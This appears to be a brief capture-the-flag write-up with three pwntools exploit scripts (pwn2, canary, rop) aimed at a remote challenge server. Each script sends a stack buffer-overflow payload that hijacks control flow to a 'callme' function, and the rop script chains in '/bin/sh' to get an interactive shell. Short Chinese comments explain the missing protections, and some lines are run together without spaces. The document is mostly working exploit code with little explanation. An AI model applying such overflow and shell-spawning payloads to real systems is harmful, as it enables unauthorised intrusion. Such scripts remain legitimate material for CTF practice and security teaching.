pwn2
from pwn import *
#p=process("./pwn2")
p=remote("120.77.155.249",10010)
payload=22 *'a'
e=ELF("./pwn2")
addr=e.symbols["callme"]
payload+=p32(addr)
p.sendlineafter("[Y/N]",'Y')
p.sendlineafter("name:",payload)
p.interactive()
没做任何防护直接控制跳转
cannry
覆盖参数满足条件
frompwnimport*
#p=process("./canary")
p=remote("120.77.155.249",10011)
payload=10*'a'
payload+=p32(0x6b8b4567)
payload+=p32(0x123456)
payload+=p32(0x1A2B3C4D)
printlen(payload)
p.sendlineafter("[Y/N]",'Y')
p.sendlineafter("payload",payload)
p.recv(4096)
p.interactive()
rop
from pwn import *
context.log_level = "debug"
#p=process("./rop")
p=remote("120.77.155.249",12345)
payload=22 *'a'
e=ELF("./rop")
addr=e.symbols['callme']
print addr
payload+=p32(addr)
payload+=p32(addr)
payload+=p32(e.search("/bin/sh").next())
p.sendlineafter("[Y/N]",'Y')
p.sendlineafter("payload",payload)
p.interactive()
网友评论